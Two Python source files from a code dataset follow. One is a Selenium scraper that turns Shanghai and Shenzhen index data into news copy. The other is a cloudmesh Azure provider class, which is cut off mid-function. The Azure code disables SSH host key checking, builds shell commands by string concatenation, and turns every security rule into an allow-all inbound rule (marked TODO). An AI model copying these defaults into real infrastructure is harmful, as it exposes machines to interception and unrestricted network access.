l1.append([gegulist[0], gegulist[1]])\n\n result.append(l1)\n\n driver.find_element_by_id('topbar_hs1').find_elements_by_tag_name('a')[2].click()\n driver.find_element_by_id('topbar_hs1').find_elements_by_tag_name('a')[2].click()\n time.sleep(6)\n tmp = driver.find_element_by_id('tab_body_rise').text.split('\\n')[:5]\n for i in tmp:\n gegulist = i.split(' ')\n l2.append([gegulist[0], gegulist[1]])\n result.append(l2)\n\n driver.find_element_by_id('topbar_hs1').find_elements_by_tag_name('a')[5].click()\n driver.find_element_by_id('topbar_hs1').find_elements_by_tag_name('a')[5].click()\n time.sleep(6)\n tmp = driver.find_element_by_id('tab_body_rise').text.split('\\n')[:5]\n for i in tmp:\n gegulist = i.split(' ')\n l3.append([gegulist[0], gegulist[1]])\n result.append(l3)\n\n driver.find_element_by_id('topbar_hs1').find_elements_by_tag_name('a')[6].click()\n driver.find_element_by_id('topbar_hs1').find_elements_by_tag_name('a')[6].click()\n time.sleep(6)\n tmp = driver.find_element_by_id('tab_body_rise').text.split('\\n')[:5]\n for i in tmp:\n gegulist = i.split(' ')\n l4.append([gegulist[0], gegulist[1]])\n result.append(l4)\n\n driver.close()\n except Exception as e:\n print('149')\n print(e)\n logging.error(e)\n return result\n\n# 生成沪指标题\ndef generatHuZhiTitle(allInformation):\n # allInformation = getHuZhiAllInformation()\n if float(allInformation[1]) > 0:\n rd = '涨'\n else:\n rd = '跌'\n\n changePrice = abs(float(allInformation[1]))\n\n\n result = '沪指' + rd + str(changePrice) + '点'\n # print(result)\n s = ''\n if allInformation[4][1] == allInformation[0][1]:\n # print(allInformation[4][1])\n # print(allInformation[0][1])\n pass\n else:\n s = ' 破' + allInformation[0][:2]+ '00' + '点'\n result = result + s\n return result\n\n# 生成深指标题\ndef generatShenZhiTitle(allInformation):\n # allInformation = getShenZhiAllInformation()\n if float(allInformation[1]) > 0:\n rd = '涨'\n else:\n rd = '跌'\n\n changePrice = abs(float(allInformation[1]))\n\n\n result = '深指' + rd + str(changePrice) + '点'\n s = ''\n if allInformation[4][1] == allInformation[0][1]:\n pass\n else:\n s = ' 破' + allInformation[0][:2] + '00' + '点'\n result = result + s\n return result\n\n\n# 生成内容\ndef generateContent(huAllIndex, shenAllIndex):\n # huAllIndex = getHuZhiAllInformation()\n # shenAllIndex = getShenZhiAllInformation()\n totalTurnover = float(huAllIndex[-1]) + float(shenAllIndex[-1])\n top5 = getAllTop5()\n huTop5 = ''\n shenTop5 = ''\n cybTop5 = ''\n zxbTop5 = ''\n\n discription = ''\n if float(huAllIndex[3]) > float(huAllIndex[4]):\n discription = '高开'\n else:\n discription = '低开'\n\n if float(huAllIndex[0]) > float(huAllIndex[3]):\n discription = discription + '高走'\n else:\n discription = discription + '低走'\n\n for i in top5[0]:\n huTop5 = huTop5 + '(' + i[0] + ')' + ' ' + i[1] + ' '\n\n for i in top5[1]:\n shenTop5 = shenTop5 + '(' + i[0] + ')' + ' ' + i[1]+ ' '\n\n for i in top5[2]:\n cybTop5 = cybTop5 + '(' + i[0] + ')' + ' '+ i[1]+ ' '\n\n for i in top5[3]:\n zxbTop5 = zxbTop5 + '(' + i[0] + ')' + ' ' + i[1] + ' '\n\n if float(huAllIndex[1]) > 0:\n hrd1 = '涨'\n hrd2 = '涨幅'\n hrd3 = huAllIndex[1]\n hrdindex = huAllIndex[2]\n else:\n hrd1 = '跌'\n hrd2 = '跌幅'\n hrd3 = huAllIndex[1][1:]\n hrdindex = huAllIndex[2][1:]\n\n if float(shenAllIndex[1]) > 0:\n srd1 = '涨'\n srd2 = '涨幅'\n srd3 = shenAllIndex[1]\n srdindex = shenAllIndex[2]\n else:\n srd1 = '跌'\n srd2 = '跌幅'\n srd3 = shenAllIndex[1][1:]\n srdindex = shenAllIndex[2][1:]\n\n result1 = '今日,沪深两市'+ discription + '。截止收盘, 沪指报' + huAllIndex[0] + '点,' + hrd1 + hrd3 + '点,' + hrd2 + hrdindex + ';' + '深成指数报' + shenAllIndex[0] + '点,'+ srd1 + srd3 + '点,' + srd2 + srdindex + ',' + '两市全日成交'+ str(totalTurnover)[:7] + '亿元。' + '\\n'*2\n result2 = '深A涨幅榜前五:' + shenTop5 + '\\n' + '沪A涨幅榜前五:' + huTop5 + '\\n' + '创业板涨幅榜前五:' + cybTop5 + '\\n' + '中小板涨幅榜前五:'+ zxbTop5\n # print(result1)\n # print()\n # print(result2)\n result = result1 + result2\n return result\n\n# 通过新浪股票API判断当天是否是交易日\ndef isMarketDay():\n flag = False\n try:\n url1 = 'http://hq.sinajs.cn/list=sh601398'\n response = requests.get(url1)\n dateString = response.text.split('=')[1].split(',')[-3]\n datelist = dateString.split('-')\n today = datetime.now()\n todaylist = [str(today.year), str(today.month), str(today.day)]\n if len(todaylist[1]) == 1:\n todaylist[1] = '0' + todaylist[1]\n if len(todaylist[2]) == 1:\n todaylist[2] = '0' + todaylist[2]\n if datelist[0] == todaylist[0] and datelist[1] == todaylist[1] and datelist[2] == todaylist[2]:\n flag = True\n return flag\n else:\n flag = False\n except Exception as e:\n print('281')\n print(e)\n logging.error(e)\n\n try:\n url1 = 'http://hq.sinajs.cn/list=sh601288'\n response = requests.get(url1)\n dateString = response.text.split('=')[1].split(',')[-3]\n datelist = dateString.split('-')\n today = datetime.now()\n todaylist = [str(today.year), str(today.month), str(today.day)]\n if len(todaylist[1]) == 1:\n todaylist[1] = '0' + todaylist[1]\n if len(todaylist[2]) == 1:\n todaylist[2] = '0' + todaylist[2]\n\n if datelist[0] == todaylist[0] and datelist[1] == todaylist[1] and datelist[2] == todaylist[2]:\n flag = True\n return flag\n else:\n flag = False\n except Exception as e:\n print('303')\n print(e)\n logging.error(e)\n try:\n url1 = 'http://hq.sinajs.cn/list=sh601939'\n response = requests.get(url1)\n dateString = response.text.split('=')[1].split(',')[-3]\n datelist = dateString.split('-')\n today = datetime.now()\n todaylist = [str(today.year), str(today.month), str(today.day)]\n if len(todaylist[1]) == 1:\n todaylist[1] = '0' + todaylist[1]\n if len(todaylist[2]) == 1:\n todaylist[2] = '0' + todaylist[2]\n\n if datelist[0] == todaylist[0] and datelist[1] == todaylist[1] and datelist[2] == todaylist[2]:\n flag = True\n return flag\n else:\n flag = False\n except Exception as e:\n print(e)\n logging.error(e)\n return flag\n\n# 生成全部小明写稿内容\ndef generateAll():\n result = None\n try:\n if isMarketDay():\n huAllIndex = getHuZhiAllInformation()\n shenAllIndex = getShenZhiAllInformation()\n\n title1 = generatHuZhiTitle(huAllIndex)\n title2 = generatShenZhiTitle(shenAllIndex)\n content = generateContent(huAllIndex, shenAllIndex)\n\n content_md5 = hashlib.md5(content.encode()).hexdigest()\n ctitle = '今日, ' + title1 + ',' + title2\n cpubtime = int(time.time())\n csource = '中证网'\n caurl = 'http://news.stockdata.cs.com.cn/hqcenter/htmls/qcenter/index.html' + \"#robot1#\" + content_md5\n cbody = content\n cparagraphnum = 2\n has_image = 0\n # result = title1 + ',' + title2 + \"\\n\" * 2 + content\n result = {'caurl': caurl, 'ctitle': ctitle,'cpubtime': cpubtime, 'csource': csource, 'cbody': cbody, 'cparagraphnum' : cparagraphnum, 'has_image': has_image}\n else:\n result = 0\n except Exception as e:\n print(e)\n logging.error(e)\n return result\n\n# 若第一次因抓取内容为None而生成失败 再次获取(确认获取)\ndef generateXiaoMingXieGao():\n result = generateAll()\n\n if result is None:\n result = generateAll()\n\n return result\n\ndef main(cwid):\n generateAll(cwid)\n\n\nif __name__ == '__main__':\n\n result = generateXiaoMingXieGao()\n print(result)\n","sub_path":"test/xiaomingxiegao/gupiaoxinxi/generateXiaoMingXieGao.py","file_name":"generateXiaoMingXieGao.py","file_ext":"py","file_size_in_byte":12908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"468700700","text":"import ctypes\nimport os\nimport subprocess\nfrom datetime import datetime\nfrom pprint import pprint\nfrom sys import platform\n\nfrom azure.common.credentials import ServicePrincipalCredentials\nfrom azure.mgmt.compute import ComputeManagementClient\nfrom azure.mgmt.network import NetworkManagementClient\nfrom azure.mgmt.network.v2018_12_01.models import SecurityRule\nfrom azure.mgmt.resource import ResourceManagementClient\nfrom cloudmesh.abstract.ComputeNodeABC import ComputeNodeABC\nfrom cloudmesh.common.Printer import Printer\nfrom cloudmesh.common.console import Console\nfrom cloudmesh.common.debug import VERBOSE\nfrom cloudmesh.common.util import HEADING, banner\nfrom cloudmesh.configuration.Config import Config\nfrom cloudmesh.mongo.CmDatabase import CmDatabase\nfrom cloudmesh.provider import ComputeProviderPlugin\nfrom msrestazure.azure_exceptions import CloudError\n\n\ndef _remove_mongo_id_obj(dict_list):\n for i in dict_list:\n try:\n i.pop('_id')\n except KeyError:\n pass\n\n return dict_list\n\n\ndef _get_az_vm_status(az_status):\n az_status = az_status.lower()\n if 'running' in az_status:\n return 'ACTIVE'\n elif 'stopped' in az_status:\n return 'STOPPED'\n else:\n return None\n\n\n# noinspection PyPep8\nclass Provider(ComputeNodeABC, ComputeProviderPlugin):\n \"\"\"\n verbosity\n\n 8 - prints major actions\n 9 - prints all images\n 10 - prints all update dicts\n\n \"\"\"\n kind = 'azure'\n\n sample = \"\"\"\n cloudmesh:\n cloud:\n {name}:\n cm:\n active: true\n heading: {name}\n host: TBD\n label: {name}\n kind: azure\n version: latest\n service: compute\n default:\n image: Canonical:UbuntuServer:16.04.0-LTS:latest\n size: Basic_A0\n resource_group: cloudmesh\n storage_account: cmdrive\n network: cmnetwork\n subnet: cmsubnet\n blob_container: vhds\n AZURE_VM_IP_CONFIG: cloudmesh-ip-config\n AZURE_VM_NIC: cloudmesh-nic\n AZURE_VM_DISK_NAME: cloudmesh-os-disk\n AZURE_VM_USER: TBD\n AZURE_VM_PASSWORD: TBD\n AZURE_VM_NAME: cloudmeshVM\n credentials:\n AZURE_TENANT_ID: {tenantid}\n AZURE_SUBSCRIPTION_ID: {subscriptionid}\n AZURE_APPLICATION_ID: {applicationid}\n AZURE_SECRET_KEY: {secretkey}\n AZURE_REGION: eastus\n \"\"\"\n\n vm_state = [\n 'ACTIVE',\n 'BUILDING',\n 'DELETED',\n 'ERROR',\n 'HARD_REBOOT',\n 'PASSWORD',\n 'PAUSED',\n 'REBOOT',\n 'REBUILD',\n 'RESCUED',\n 'RESIZED',\n 'REVERT_RESIZE',\n 'SHUTOFF',\n 'SOFT_DELETED',\n 'STOPPED',\n 'SUSPENDED',\n 'UNKNOWN',\n 'VERIFY_RESIZE'\n ]\n\n output = {\n \"status\": {\n \"sort_keys\": [\"cm.name\"],\n \"order\": [\"cm.name\",\n \"cm.cloud\",\n \"vm_state\",\n \"status\",\n \"task_state\"],\n \"header\": [\"Name\",\n \"Cloud\",\n \"State\",\n \"Status\",\n \"Task\"]\n },\n \"vm\": {\n \"sort_keys\": [\"cm.name\"],\n \"order\": [\n \"cm.name\",\n \"cm.cloud\",\n \"id\",\n \"type\",\n \"location\",\n \"hardware_profile.vm_size\",\n \"storage_profile.image_reference.offer\",\n \"storage_profile.image_reference.sku\",\n \"storage_profile.os_disk.disk_size_gb\",\n \"provisioning_state\",\n \"vm_id\",\n \"cm.kind\"],\n \"header\": [\n \"Name\",\n \"Cloud\",\n \"Id\",\n \"Type\",\n \"Location\",\n \"VM Size\",\n \"OS Name\",\n \"OS Version\",\n \"OS Disk Size\",\n \"Provisioning State\",\n \"VM ID\",\n \"Kind\"]\n },\n \"image\": {\n \"sort_keys\": [\"cm.name\",\n \"plan.publisher\"],\n \"order\": [\"cm.name\",\n \"location\",\n \"plan.publisher\",\n \"plan.name\",\n \"plan.product\",\n \"operating_system\"],\n \"header\": [\"Name\",\n \"Location\",\n \"Publisher\",\n \"Plan Name\",\n \"Product\",\n \"Operating System\",\n ]\n },\n \"flavor\": {\n \"sort_keys\": [\"name\",\n \"number_of_cores\",\n \"os_disk_size_in_mb\"],\n \"order\": [\"name\",\n \"number_of_cores\",\n \"os_disk_size_in_mb\",\n \"resource_disk_size_in_mb\",\n \"memory_in_mb\",\n \"max_data_disk_count\"],\n \"header\": [\"Name\",\n \"NumberOfCores\",\n \"OS_Disk_Size\",\n \"Resource_Disk_Size\",\n \"Memory\",\n \"Max_Data_Disk\"]},\n # \"status\": {},\n \"key\": {}, # Niranda, we need this for printing tables\n \"secgroup\": {}, # Niranda, we need this for printing tables\n \"secrule\": {}, # Niranda, we need this for printing tables\n }\n\n # noinspection PyPep8Naming\n def __init__(self, name=\"azure\", credentials=None):\n \"\"\"\n Initializes the provider. The default parameters are read from the\n configuration file that is defined in yaml format.\n\n :param name: The name of the provider as defined in the yaml file\n :param configuration: The location of the yaml configuration file\n \"\"\"\n\n conf = Config()[\"cloudmesh\"]\n\n self.user = Config()[\"cloudmesh\"][\"profile\"][\"user\"]\n\n self.spec = conf[\"cloud\"][name]\n self.cloud = name\n\n cred = self.spec[\"credentials\"]\n self.default = self.spec[\"default\"]\n self.cloudtype = self.spec[\"cm\"][\"kind\"]\n super().__init__(name)\n\n # update credentials with the passed dict\n if credentials is not None:\n cred.update(credentials)\n\n VERBOSE(cred, verbose=10)\n\n if self.cloudtype != 'azure':\n Console.error(\"This class is meant for azure cloud\")\n\n # ServicePrincipalCredentials related Variables to configure in\n # cloudmesh.yaml file\n\n # AZURE_APPLICATION_ID = ''\n\n # AZURE_SECRET_KEY = ''\n\n # AZURE_TENANT_ID = ''\n\n credentials = ServicePrincipalCredentials(\n client_id=cred['AZURE_APPLICATION_ID'],\n secret=cred['AZURE_SECRET_KEY'],\n tenant=cred['AZURE_TENANT_ID']\n )\n\n subscription = cred['AZURE_SUBSCRIPTION_ID']\n\n # Management Clients\n self.resource_client = ResourceManagementClient(\n credentials, subscription)\n self.compute_client = ComputeManagementClient(\n credentials, subscription)\n self.network_client = NetworkManagementClient(\n credentials, subscription)\n\n # VMs abbreviation\n self.vms = self.compute_client.virtual_machines\n self.imgs = self.compute_client.virtual_machine_images\n\n # Azure Resource Group\n self.GROUP_NAME = self.default[\"group\"]\n\n # Azure Datacenter Region\n self.LOCATION = cred[\"AZURE_REGION\"]\n\n # NetworkManagementClient related Variables\n self.VNET_NAME = self.default[\"network\"]\n self.SUBNET_NAME = self.default[\"subnet\"]\n self.IP_CONFIG_NAME = self.default[\"AZURE_VM_IP_CONFIG\"]\n\n # Azure VM Storage details\n self.OS_DISK_NAME = self.default[\"AZURE_VM_DISK_NAME\"]\n self.USERNAME = self.default[\"AZURE_VM_USER\"]\n self.PASSWORD = self.default[\"AZURE_VM_PASSWORD\"]\n self.VM_NAME = self.default[\"AZURE_VM_NAME\"]\n self.NIC_NAME = self.default[\"AZURE_VM_NIC\"]\n\n # public IPs\n self.PUBLIC_IP__NAME = self.VM_NAME + '-pub-ip'\n\n # Create or Update Resource group\n self._get_resource_group()\n\n self.cmDatabase = CmDatabase()\n\n self.protocol_str_map = {\n 'tcp': 'Tcp',\n 'udp': 'Udp',\n 'icmp': 'Icmp',\n 'esp': 'Esp',\n 'ah': 'Ah',\n '*': '*'\n }\n\n # noinspection PyPep8Naming\n def Print(self, data, output=None, kind=None):\n if output == \"table\":\n if kind == \"secrule\":\n\n result = []\n for group in data:\n for rule in group['security_group_rules']:\n rule['name'] = group['name']\n result.append(rule)\n data = result\n\n order = self.output[kind]['order'] # not pretty\n header = self.output[kind]['header'] # not pretty\n humanize = self.output[kind]['humanize'] # not pretty\n\n print(Printer.flatwrite(data,\n sort_keys=[\"name\"],\n order=order,\n header=header,\n output=output,\n humanize=humanize)\n )\n else:\n print(Printer.write(data, output=output))\n\n def keys(self):\n \"\"\"\n The keys command in Azure is not supported\n\n TODO: BUG: therefore it should just return the keys form the local db to\n make it appear it is supported. So instead do get the output,\n see how it is implemented in key list\n\n :return:\n \"\"\"\n Console.error(\"Key list is not supported in Azure!\")\n Console.msg(\"Please use \")\n Console.msg(\"\")\n Console.msg(\" cms key list \")\n Console.msg(\"\")\n return None\n\n def key_upload(self, key=None):\n \"\"\"\n TODO: implement alternative\n\n azure does not allow explicit key upload!\n\n\n :param key:\n :return:\n \"\"\"\n Console.error(f'Azure does not allow explicit key upload! '\n f'Please use \\'cms key\\' operations to add keys to the '\n f'local db and reference them at the VM creation!')\n\n return None\n\n def key_delete(self, name=None):\n \"\"\"\n TODO: implement alternative\n\n azure does not allow explicit key upload!\n\n\n :param name:\n :return:\n \"\"\"\n Console.error(f\"Azure does not allow explicit key delete! \"\n f\"Please use 'cms key' operations to delete keys from \"\n f\"the local db!\")\n return None\n\n def _get_az_public_ip(self, ip_name):\n ip = next((x for x in self.list_public_ips() if\n x['name'] == ip_name), None)\n return ip\n\n def get_public_ip(self, name=None):\n \"\"\"\n returns public IP by vm name from the Az public IPs\n\n :param name:\n :return:\n \"\"\"\n _, pub_ip = self._get_pub_ip_for_vm(name)\n return pub_ip['ip_address']\n\n # these are available to be associated\n def list_public_ips(self, ip=None, available=False):\n \"\"\"\n lists public ips of the group\n\n :param ip:\n :param available:\n :return:\n \"\"\"\n list_result = [i.__dict__ for i in\n self.network_client.public_ip_addresses.list(\n self.GROUP_NAME)]\n\n return self.update_dict(list_result, kind='ip')\n\n def delete_public_ip(self, ip=None):\n \"\"\"\n deletes public ip by name\n\n :param ip:\n :return:\n \"\"\"\n if ip is not None:\n res = self.network_client.public_ip_addresses.delete(\n self.GROUP_NAME,\n ip\n )\n res.wait()\n\n Console.info(f'{ip} was deleted!')\n else:\n Console.warning('No ip was provided')\n\n def create_public_ip(self):\n \"\"\"\n Creates public IP for the group using the ip name provided in the config\n as a prefix\n\n :return:\n \"\"\"\n current_pub_count = len(self.list_public_ips())\n\n public_ip_params = {\n 'location': self.LOCATION,\n 'sku': {\n 'name': 'Basic',\n }\n }\n\n creation_result = self.network_client.public_ip_addresses. \\\n create_or_update(self.GROUP_NAME,\n f\"{self.PUBLIC_IP__NAME}_{current_pub_count}\",\n public_ip_params,\n ).result()\n Console.info(\"Public IP created: \" + creation_result.name)\n return self.update_dict([creation_result.as_dict()], kind='ip')\n\n def find_available_public_ip(self):\n \"\"\"\n Azure currently has no direct API to check if an IP is available or not!\n Hence create an IP everytime this method is called!\n\n :return:\n \"\"\"\n # pub_ips = self.list_public_ips()\n #\n # for ip in pub_ips:\n # if ip['ip_configuration'] is None:\n # # if ip_configuration is none -> ip is available\n # # --> return it!\n # Console.info(f\"Found available ip {ip['name']}\")\n # return ip\n\n # if not len(pub_ips) == 0 create one\n Console.info(f\"Creating new public IP\")\n return self.create_public_ip()\n\n def attach_public_ip(self, node=None, ip=None):\n \"\"\"\n attaches a public ip to a node\n\n :param node:\n :param ip:\n :return:\n \"\"\"\n ip = self.find_available_public_ip()[0].as_dict()\n\n # remove cm dict\n ip.pop('cm')\n\n # to attach a public ip, get the nic and update the public ip field via\n # IP config\n ip_config = self.network_client.network_interface_ip_configurations.get(\n self.GROUP_NAME, self.NIC_NAME, self.IP_CONFIG_NAME\n )\n\n ip_config.public_ip_address = ip\n\n res = self.network_client.network_interfaces.create_or_update(\n self.GROUP_NAME,\n self.NIC_NAME,\n parameters={\n 'location': self.LOCATION,\n 'ip_configurations': [ip_config.as_dict()]\n }\n )\n\n return res.result()\n\n def detach_public_ip(self, node=None, ip=None):\n \"\"\"\n detaches public IP\n\n :param node:\n :param ip:\n :return:\n \"\"\"\n if ip is None:\n vm_obj = self._get_local_vm(node)\n nic_id = vm_obj['network_profile']['network_interfaces'][0]['id']\n pub_ip = self._get_az_pub_ip_from_nic_id(nic_id)\n\n ip = pub_ip.name\n\n req = self.network_client.public_ip_addresses.delete(self.GROUP_NAME,\n ip)\n req.wait()\n Console.info(f\"deleted pub ip {ip}\")\n\n def _get_az_pub_ip_from_nic_id(self, nic_id):\n \"\"\"\n gets azure public ip using NIC ID\n\n :param nic_id:\n :return:\n \"\"\"\n pub_ip = None\n for ip in list(self.network_client.public_ip_addresses\n .list(self.GROUP_NAME)):\n if ip.ip_configuration is not None and nic_id \\\n in ip.ip_configuration.id:\n pub_ip = ip\n return pub_ip\n\n def _get_local_vm(self, vm_name, quiet=False):\n \"\"\"\n gets local vm from the db\n\n :param vm_name:\n :param quiet:\n :return:\n \"\"\"\n vm_search = list(\n self.cmDatabase.collection('azure-vm').find({'name': vm_name}))\n\n if not quiet and len(vm_search) == 0:\n raise Exception(f\"unable to locate {vm_name} in local db!\")\n\n return vm_search[0] if len(vm_search) > 0 else None\n\n def _get_pub_ip_for_vm(self, vm):\n if isinstance(vm, dict):\n vm_obj = vm\n else:\n vm_obj = self._get_local_vm(vm)\n\n nic_id = vm_obj['network_profile']['network_interfaces'][0]['id']\n\n pub_ip = self._get_az_pub_ip_from_nic_id(nic_id)\n if pub_ip is None:\n raise Exception(f\"unable to find public IP for {vm}\")\n\n return vm_obj, pub_ip.as_dict()\n\n # noinspection PyPep8\n def ssh(self, vm=None, command=None):\n \"\"\"\n runs ssh\n\n :param vm:\n :param command:\n :return:\n \"\"\"\n\n if vm is None:\n raise Exception(f\"vm or command can not be null\")\n\n if command is None:\n command = \"\"\n\n vm_obj, pub_ip = self._get_pub_ip_for_vm(vm)\n\n # in the current API (vm/Provider), it does not provide a key name for\n # ssh. therefore, the key needs to be pulled from the vm. And therefore\n # key name is injected to the local db entry as 'ssh_key_name'\n key_obj = self._get_local_key_content(vm_obj['cm']['ssh_key_name'])\n\n cmd = \"ssh \" \\\n \"-o StrictHostKeyChecking=no \" \\\n \"-o UserKnownHostsFile=/dev/null \" \\\n f\"-i {key_obj['location']['private']} \" \\\n f\"{self.USERNAME}@{pub_ip['ip_address']} {command}\"\n cmd = cmd.strip()\n\n if command == \"\":\n if platform.lower() == 'win32':\n class disable_file_system_redirection:\n _disable = ctypes.windll.kernel32.Wow64DisableWow64FsRedirection\n _revert = ctypes.windll.kernel32.Wow64RevertWow64FsRedirection\n\n def __enter__(self):\n self.old_value = ctypes.c_long()\n self.success = self._disable(\n ctypes.byref(self.old_value))\n\n def __exit__(self, type_, value, traceback):\n if self.success:\n self._revert(self.old_value)\n\n with disable_file_system_redirection():\n os.system(cmd)\n else:\n os.system(cmd)\n else:\n if platform.lower() == 'win32':\n class disable_file_system_redirection:\n _disable = ctypes.windll.kernel32.Wow64DisableWow64FsRedirection\n _revert = ctypes.windll.kernel32.Wow64RevertWow64FsRedirection\n\n def __enter__(self):\n self.old_value = ctypes.c_long()\n self.success = self._disable(\n ctypes.byref(self.old_value))\n\n def __exit__(self, type_, value, traceback):\n if self.success:\n self._revert(self.old_value)\n\n with disable_file_system_redirection():\n Console.info('cmd: ' + cmd)\n ssh = subprocess.Popen(cmd,\n shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n else:\n Console.info('cmd: ' + cmd)\n ssh = subprocess.Popen(cmd,\n shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n result = ssh.stdout.read().decode(\"utf-8\")\n if not result:\n error = ssh.stderr.readlines()\n Console.error(error)\n else:\n Console.info(\"cmd result: \" + result)\n return result\n\n def _get_resource_group(self):\n groups = self.resource_client.resource_groups\n if groups.check_existence(self.GROUP_NAME):\n return groups.get(self.GROUP_NAME)\n else:\n # Create or Update Resource groupCreating new public IP\n Console.info('Creating Azure Resource Group')\n res = groups.create_or_update(self.GROUP_NAME,\n {'location': self.LOCATION})\n Console.info('Azure Resource Group created: ' + res.name)\n return res\n\n def set_server_metadata(self, name, **metadata):\n \"\"\"\n sets server metadata\n\n :param name:\n :param metadata:\n :return:\n \"\"\"\n # see https://docs.microsoft.com/en-us/azure/azure-resource-manager/resource-group-using-tags\n # https://github.com/Azure-Samples/virtual-machines-python-manage/blob/master/example.py\n # tags = FlatDict(cm)\n\n data = {}\n if metadata is not None and isinstance(metadata, dict) and 'cm' in metadata:\n if isinstance(metadata['cm'], str):\n import ast\n data.update(ast.literal_eval(metadata['cm']))\n else:\n data.update(metadata['cm'])\n\n if name is None:\n name = self.VM_NAME\n\n async_vm_key_updates = self.vms.create_or_update(\n self.GROUP_NAME,\n name,\n {\n 'location': self.LOCATION,\n 'tags': data\n })\n async_vm_key_updates.wait()\n\n return async_vm_key_updates.result().tags\n\n def get_server_metadata(self, name):\n \"\"\"\n gets server metadata\n\n :param name:\n :return:\n \"\"\"\n if name is None:\n name = self.VM_NAME\n\n tags_dict = self.vms.get(self.GROUP_NAME, name)\n\n return tags_dict.tags\n\n def delete_server_metadata(self, name, key=None):\n \"\"\"\n deletes server metadata\n\n :param name:\n :param key:\n :return:\n \"\"\"\n if name is None:\n name = self.VM_NAME\n\n tags_dict = self.get_server_metadata(name)\n\n if key is not None:\n try:\n tags_dict.pop(key)\n except KeyError:\n print(\"Key \" + key + \" not found\")\n\n async_vm_tag_updates = self.vms.update(self.GROUP_NAME, name,\n {\n 'tags': tags_dict\n })\n async_vm_tag_updates.wait()\n\n return async_vm_tag_updates.result().tags\n\n def list_secgroups(self, name=None):\n \"\"\"\n List the security group by name\n\n :param name: The name of the group, if None all will be returned\n :return:\n \"\"\"\n local_sec_groups = self._get_local_sec_groups(name)\n Console.info('Local security groups: ')\n [Console.info(str(i)) for i in local_sec_groups]\n\n az_sec_groups = self._get_az_sec_groups(name)\n Console.info('Az security groups: ')\n [Console.info(str(i.__dict__)) for i in az_sec_groups]\n\n return local_sec_groups\n\n def _get_az_sec_groups(self, name=None):\n \"\"\"\n gets azure sec groups\n\n :param name:\n :return:\n \"\"\"\n groups = self.network_client.network_security_groups.list(\n self.GROUP_NAME)\n ret = []\n for res in groups:\n if name is not None:\n if name == res.name:\n ret.append(res)\n else:\n ret.append(res)\n\n return ret\n\n def _get_local_sec_groups(self, name=None):\n \"\"\"\n gets local sec groups from db\n\n :param name:\n :return:\n \"\"\"\n # if name is none, return all the groups, else filter the groups by name\n query = {} if name is None else {'name': name}\n\n local_sec_group = \\\n self.cmDatabase.collection('local-secgroup').find(query)\n\n if local_sec_group.count() == 0:\n raise ValueError(f'No security groups were not found in '\n f'local db for: {name}')\n\n res = list(local_sec_group)\n\n return _remove_mongo_id_obj(res)\n\n def _get_local_sec_rules(self, group_name=None):\n \"\"\"\n gets local sec rules from db\n\n :param group_name:\n :return:\n \"\"\"\n # if group_name is none, return all sec rules\n sec_rules = None\n if group_name is None:\n sec_rules = list(\n self.cmDatabase.collection('local-secrule').find({}))\n else:\n group = self._get_local_sec_groups(group_name)\n query = {'name': {'$in': group[0]['rules']}}\n sec_rules = list(\n self.cmDatabase.collection('local-secrule').find(query)\n )\n\n return _remove_mongo_id_obj(sec_rules)\n\n def list_secgroup_rules(self, name='default'):\n \"\"\"\n List the security group rules by for provided Network Security Group\n\n :param name: The name of the group\n :return:\n \"\"\"\n local_sec_rules = self._get_local_sec_rules(name)\n Console.info(f'local security rules for \\'{name}\\': '\n f'{str(local_sec_rules)}')\n\n try:\n az_sec_rules = self.network_client.security_rules.list(\n self.GROUP_NAME, name)\n Console.info(f'az security rules for \\'{name}\\': ')\n [Console.info(i.__str__()) for i in az_sec_rules]\n except CloudError as e:\n Console.warning(\"Error in pulling sec rules: \" + str(e))\n\n def _sec_rules_local_to_az(self, sec_rule_names):\n \"\"\"\n translate local rules to aure sec rules\n\n :param sec_rule_names:\n :return:\n \"\"\"\n # local rules from the db\n sec_rules = self.cmDatabase.collection('local-secrule').find(\n {'name': {'$in': sec_rule_names}})\n\n az_sec_rules = []\n priority = 100\n for rule in sec_rules:\n az_rule = SecurityRule(\n protocol=self.protocol_str_map.get(rule['protocol'].lower()),\n name=rule['name'],\n access='Allow', # todo: can only set Allows!\n direction='Inbound', # todo: add appropriate\n source_address_prefix='*', # todo: add appropriate\n destination_address_prefix='*', # todo: add appropriate\n source_port_range='*', # todo: add appropriate\n destination_port_range='*', # todo: add appropriate\n priority=priority\n )\n az_sec_rules.append(az_rule)\n priority = priority + 1\n\n return az_sec_rules\n\n def _add_local_sec_group(self, name, description):\n \"\"\"\n adds sec group locally to db\n\n :param name:\n :param description:\n :return:\n \"\"\"\n add_group = {\n \"description\": description,\n \"rules\": [],\n \"name\": name,\n \"cm\": {\n \"kind\": \"secgroup\",\n \"name\": name,\n \"cloud\": \"local\",\n \"collection\": \"local-secgroup\",\n \"created\": str(datetime.now()),\n \"modified\": str(datetime.now())\n }\n }\n\n self.cmDatabase.collection('local-secgroup').insert_one(add_group)\n return add_group\n\n def _add_az_sec_group(self, name):\n \"\"\"\n adds sec group to azure\n\n :param name:\n :return:\n \"\"\"\n parameters = {\n 'location': self.LOCATION,\n }\n\n result_add_security_group = self.network_client. \\\n network_security_groups.create_or_update(self.GROUP_NAME, name,\n parameters)\n\n return result_add_security_group.result()\n\n def add_secgroup(self, name=None, description=None):\n \"\"\"\n Adds the sec group locally\n :param name: Name of the group\n :param description: The description\n :return:\n \"\"\"\n if name is None:\n name = 'default'\n\n try:\n local_sec_group = self._get_local_sec_groups(name)[0]\n Console.info(f\"local sec group: {str(local_sec_group)}\")\n except ValueError:\n local_sec_group = self._add_local_sec_group(name, description)\n Console.warning(f'{name} sec group is not found! Created new '\n f'group: {str(local_sec_group)}')\n\n # self._add_az_sec_group(name)\n\n Console.info(\"sec group created successfully!\")\n return local_sec_group\n\n def add_secgroup_rule(self,\n name=None, # group name\n port=None,\n protocol=None,\n ip_range=None):\n \"\"\"\n Adding sec rule to the local db as azure does not support explicit sec\n rules\n :param name:\n :param port:\n :param protocol:\n :param ip_range:\n :return:\n \"\"\"\n # todo: change these defaults\n protocol = \"tcp\" if protocol is None else protocol\n ip_range = \"0.0.0.0/0\" if ip_range is None else ip_range\n port = \"22:22\" if port is None else port\n name = \"ssh\" if name is None else name\n\n add_rule = self.update_dict({\n \"protocol\": protocol,\n \"ip_range\": ip_range,\n \"ports\": port,\n \"name\": name,\n }, kind='secrule')[0]\n\n 